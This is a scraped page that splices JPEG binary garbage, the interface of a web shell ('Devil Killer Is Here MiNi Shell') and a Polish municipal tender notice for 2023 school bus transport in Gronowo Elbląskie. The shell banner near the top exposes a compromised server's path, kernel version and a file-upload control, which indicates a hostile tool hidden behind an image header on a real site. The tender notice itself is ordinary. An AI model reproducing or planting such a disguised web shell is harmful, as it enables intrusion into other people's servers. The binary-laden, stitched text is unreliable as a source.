JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221108/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221108/0042924301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dowóz i odwóz dzieci z terenu Gminy Gronowo Elbląskie do Zespołu Szkół w Gronowie Elbląskim i Zespołu Szkół w Jegłowniku w okresie od 01.01.2023r. do 31.12.2023r. poprzez zakup biletów miesięcznych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA GRONOWO ELBLĄSKIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 170748070</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Łączności 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gronowo Elbląskie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">82-335</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL621 - Elbląski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">55 231 56 13</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">55 231 56 23</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gminagronowo@gminagronowo.pl,</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gminagronowo.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dowóz i odwóz dzieci z terenu Gminy Gronowo Elbląskie do Zespołu Szkół w Gronowie Elbląskim i Zespołu Szkół w Jegłowniku w okresie od 01.01.2023r. do 31.12.2023r. poprzez zakup biletów miesięcznych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-add4a2f5-5f66-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00429243</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-11-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002174/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Dowóz i odwóz dzieci z terenu Gminy Gronowo Elbląskie do Zespołu Szkół w Gronowie Elbląskim i w Jegłowniku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bipgronowo.warmia.mazury.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.	Komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej.<br/>2.	W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającymi, a Wykonawcami odbywa się przy użyciu miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/, ePUAPu, dostępnego pod adresem: epuap.gov.pl/wps/portal/strefa-klienta/katalog-spraw/profil-urzedu/UG_Gronowo_Elblaskie / Pokaż cały Katalog Spraw/ oraz poczty elektronicznej gminagronowo@gminagronowo.pl<br/>3.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: ”Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza komunikacji”.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">4.	Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).<br/>5.	Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB.<br/>2.	Dokumenty elektroniczne, składane są przez Wykonawcę za pośrednictwem „Formularza do komunikacji” jako załączniki. Sposób sporządzenia dokumentów elektronicznych musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. (dalej RODO) informuję, iż administratorem Pani/Pana danych osobowych jest Gmina Gronowo Elbląskie z siedzibą przy ul. Łączności 3, 82-335 Gronowo Elbląskie, reprezentowana przez Wójta Gminy Gronowo Elbląskie. <br/>1)	Administrator wyznaczył Inspektora Danych Osobowych kontakt: Pani Katarzyna Jankowska, kontakt: listownie na adres: ul. Łączności 3, 82-335 Gronowo Elbląskie, e-mail: katarzynajankowska.iod@wp.pl.<br/>2)	Dane osobowe przetwarzane będą w celu związanym z postępowaniem o udzielenie zamówienia publicznego ZRGo.ZP.271.15.2022r. na „Dowóz i odwóz dzieci z terenu Gminy Gronowo Elbląskie do Zespołu Szkół w Gronowie Elbląskim i Zespołu Szkół w Jegłowniku wraz z opiekunami w okresie od 01.01.2023r. do 31.12.2023r. poprzez zakup biletów miesięcznych z wyłączeniem dni wolnych od zajęć lekcyjnych” prowadzonym w trybie podstawowym zgodnie z art. 275 pkt 1 ustawy Pzp, <br/>3)	Pani/Pan dane osobowe będą lub mogą być przekazywane wyłącznie podmiotom uprawnionym do uzyskania danych osobowych na podstawie przepisów prawa, szczególności odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postepowania w oparciu o art. 18 oraz art. 74 ustawy Pzp<br/>4) Podawane dane osobowe będą przechowywane przez okres niezbędny do realizacji wskazanych w pkt 2 celów, a po tym czasie przez okres oraz w zakresie wymaganym przez przepisy prawa,<br/>5)	Posiada Pani/Pan:<br/>- na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>- na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; - prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO; <br/>Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników. Prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.<br/>6)	Nie przysługuje Pani/Panu:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZRGo.271.15.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest dowóz i odwóz dzieci z terenu Gminy Gronowo Elbląskie do Zespołu Szkół w Gronowie Elbląskim i Zespołu Szkół w Jegłowniku wraz <br/>z opiekunami w okresie od 01.01.2023r. do 31.12.2023r. poprzez zakup biletów miesięcznych z wyłączeniem dni wolnych od zajęć szkolnych.<br/>2.	Każda trasa przejazdów autobusów winna być dostosowana do dowozu dzieci do placówek oświatowych na terenie Gminy Gronowo Elbląskie tj. Zespół Szkół w Gronowie Elbląskim i Zespół Szkół w Jegłowniku na godzinę 8:00 i odwiezienia po zakończeniu lekcji ze szkół: <br/><br/>Lp.	Nazwa placówki	Kierunek odwozu	Dzień tygodnia	Ilość kursów<br/><br/>1	Zespół Szkół w Jegłowniku	Nogat, Kopanka Pierwsza, Błotnica* poniedziałek - piątek	2 kursy<br/> Kopanka Druga, Wiktorowo, Wikrowo, Szopy	Poniedziałek - piątek	2 kursy<br/>2	Zespół Szkół w Gronowie Elbląskim	Różany, Rozgart	poniedziałek - piątek<br/>	2 kursy<br/> Jasionno, Gajewiec, Karczowiska Górne,	poniedziałek - piątek	2 kursy<br/> Jasionno	poniedziałek - piątek	1 kurs<br/> Dworki, Fiszewo	poniedziałek, piątek<br/>wtorek, środa, czwartek	2 kursy<br/>3 kursy<br/> Jegłownik	poniedziałek - piątek	1 kurs<br/><br/>3.	Ilość uczniów dojeżdżających do szkół z poszczególnych miejscowości zamieszczone są w załączniku nr 1 do SWZ, są wartościami prognozowanymi. <br/>4.	Zamawiający wymaga, aby Wykonawca dysponował odpowiednią liczbą środków transportowych (min. 4 pojazdy) z odpowiednią ilością miejsc siedzących dostosowanych do ilości dowożonych osób. <br/>5.	Pojazdy służące do przewozu muszą spełniać warunki techniczne niezbędne do dopuszczenia w ruchu drogowym. Wykonawca jest zobowiązany do punktualnego przestrzegania planu dowozu, a w przypadku awarii autobusu jest zobowiązany do podstawienia innego pojazdu w ciągu 30 minut od zdarzenia. <br/>6.	Wykonawca zapewnia opiekę nad uczniami w czasie przewozów, osoby zatrudnione do sprawowania opieki winny posiadać przeszkolenie dot. udzielania pierwszej pomocy przedmedycznej. <br/>7.	Zamawiający dopuszcza zmianę godzin przewozów w okresie realizacji niniejszego zamówienia. Zamawiający zastrzega sobie możliwość wprowadzenia na określone dni innego niż ustalony rozkład jazdy, po wcześniejszym powiadomieniu Wykonawcy. <br/>8.	W przypadku zmiany organizacji zajęć polegającej na odpracowywaniu zajęć z dnia wypadającego pomiędzy dwoma świątecznymi ustawowo wolnymi od pracy lub piątku wypadającego bezpośrednio po dniu świątecznym ustawowo wolnym od pracy, przewoźnik zostaje powiadomiony przez Zamawiającego za pośrednictwem dyrektora danej placówki o zmianie terminu dowozu. <br/>9.	Zamawiający wymaga zatrudnienia przy realizacji zamówienia przez Wykonawcę lub podwykonawcę wszystkich kierowców autobusów na podstawie umowy o pracę. Wyżej wymienione osoby powinny być zatrudnione w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. Kodeks pracy (t. j. Dz. U. z 2022r., poz. 1510 ze zm.) przez cały okres wykonywania zamówienia.<br/>10.	Podwykonawstwo:<br/>1)	Wykonawca może powierzyć wykonanie części zamówienia Podwykonawcy. Zamawiający <br/>nie zastrzega obowiązku osobistego wykonania przez Wykonawcę kluczowych części zamówienia. <br/>2)	Zamawiający żąda wskazania przez Wykonawcę część zamówienia, której wykonanie zamierza powierzyć Podwykonawcy oraz podania nazw ewentualnych Podwykonawców, jeżeli są już znani – Formularz oferty załącznik nr 2 do SWZ.<br/>3)	W przypadku, kiedy Wykonawca nie wskaże w ofercie części, którą zamierza powierzyć Podwykonawcom, Zamawiający przyjmie, że Wykonawca zrealizuje zamówienie samodzielnie.<br/>4)	Powierzenie wykonania części zamówienia podwykonawcom nie zwalnia Wykonawcy z odpowiedzialności za należyte wykonanie tego zamówienia.<br/>5)	Warunki realizacji zamówienia przy udziale Podwykonawców określają postanowienia projektu umowy załącznik nr 9 do SWZ.<br/>6)	W przypadku uzyskania zamówienia i realizacji robót przy udziale podwykonawców, Wykonawca zobowiązany będzie do zawarcia umów z podwykonawcami, zgodnie z postanowieniami art. 463 ustawy Pzp oraz z zapisami zawartymi w projekcie umowy stanowiącym załącznik nr 9 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">22459000-2 - Bilety</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-01-01 do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>a)	cena (brutto) - 60 % (max 60 pkt),<br/>b)	termin płatności faktury - 40 % (max. 40 pkt),<br/> <br/>Łącznie, oferta może uzyskać maksymalnie 100 % ( max 100 pkt)<br/>2.	Sposób oceny ofert:<br/>a) w kryterium cena (brutto) :<br/>Oferta z najniższą ceną otrzyma 60 % (60 pkt), natomiast pozostałe oferty będą obliczone wg następującego wzoru:<br/> najniższa cena brutto spośród złożonych ważnych ofert<br/>liczba punktów w kryterium cena = ----------------------------------------------------------- x 60<br/> cena brutto oferty badanej<br/><br/>b)	w kryterium termin płatności faktury:<br/>Termin płatności faktury Wykonawca wpisuje w formularzu oferty, stanowiący załącznik nr 3 do SWZ.<br/>Liczba punktów przyznanych Wykonawcy w kryterium płatność faktury:<br/>a.	14 dni - 0 pkt,<br/>b.	21 dni - 20 pkt,<br/>c.	30 dni - 40 pkt. <br/>Wykonawca nie może zaproponować terminów płatności faktury inne niż wskazane powyżej. W przypadku podania terminu płatności w sposób odmienny niż wynikający z powyższych wskazań, Wykonawcy w tym kryterium zostanie przyznane 0 punktów.<br/>c)	obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku, przy zastosowaniu matematycznych reguł zaokrąglania liczb.<br/>3.	Za najkorzystniejszą zostanie uznana oferta, która otrzyma największą łączną liczbę punktów w poszczególnych kryteriach oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące: <br/>1)	zdolności do występowania w obrocie gospodarczym – Zamawiający odstępuje od wymagania podmiotowych środków dowodowych w tym zakresie,<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów - warunek zostanie spełniony, gdy Wykonawca przedłoży ważne zezwolenia na wykonywanie przewozów regularnych na liniach komunikacyjnych na obszarze Gminy Gronowo Elbląskie zgodnie z ustawą z dnia 06 września 2001r. o transporcie drogowym (t. j. Dz. U. z 2022r., poz. 2201) lub przedłoży oświadczenie, że po wyborze jego oferty przed podpisaniem umowy na przedmiotowe zamówienie publiczne dostarczy Zamawiającemu powyższe zezwolenia. Zezwolenia winny obejmować trasy wskazane w SWZ.<br/>3)	sytuacji ekonomicznej lub finansowej – Zamawiający odstępuje od wymagania podmiotowych środków dowodowych w tym zakresie,<br/>4)	zdolności technicznej lub zawodowej – <br/>a)	wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych Wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami - warunek będzie spełniony jeżeli wykonawca będzie dysponował:<br/>minimum 4 w pełni sprawne technicznie autobusy (jeden autobus stanowić będzie zastępczy środek transportu), wiek pojazdów nie może być większy niż 6 lat (ograniczenie wiekowe nie dotyczy pojazdu oddanego do dyspozycji przez Zamawiającego),<br/>b)	wykaz osób w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi osobami - warunek będzie spełniony jeżeli wykonawca będzie dysponował:<br/>minimum 3 osobami odpowiedzialnymi za sprawowanie opieki nad przewożonymi uczniami wraz z zaświadczeniami dot. umiejętności udzielenia pierwszej pomocy przedmedycznej przez te osoby. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenia lub dokumenty składane przez Wykonawcę na wezwanie Zamawiającego, potwierdzające spełnianie warunków udziału w postępowaniu: <br/>1)	ważne zezwolenia na wykonywanie przewozów regularnych na liniach komunikacyjnych na obszarze Gminy Gronowo Elbląskie zgodnie z ustawą z dnia 06 września 2001r. o transporcie drogowym (t. j. Dz. U. z 2022r., poz. 2021) przedłoży oświadczenie, że po wyborze jego oferty przed podpisaniem umowy na przedmiotowe zamówienie publiczne dostarczy Zamawiającemu powyższe zezwolenia. Zezwolenia winny obejmować trasy wskazane w SWZ.<br/>Uwaga:<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty składa ten z Wykonawców, który w imieniu wszystkich wykazywać będzie spełnianie warunku określonego Rozdziale XX ust. 1 pkt 2 SWZ.<br/><br/>2)	wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych Wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami - warunek będzie spełniony jeżeli wykonawca będzie dysponował:<br/>minimum 4 w pełni sprawne technicznie autobusy (jeden autobus stanowić będzie zastępczy środek transportu), wiek pojazdów nie może być większy niż 6 lat (ograniczenie wiekowe nie dotyczy pojazdu oddanego do dyspozycji przez Zamawiającego),<br/>Uwaga:<br/>a)	wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych Wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami należy sporządzić na druku zgodnie ze wzorem stanowiącym załącznik nr 7 do SWZ,<br/>b)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty składa ten z Wykonawców, który w imieniu wszystkich wykazywać będzie spełnianie warunku określonego Rozdziale XX ust. 1 pkt 4a) SWZ.<br/><br/>3)	wykaz osób w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi osobami - warunek będzie spełniony jeżeli wykonawca będzie dysponował:<br/>minimum 3 osobami 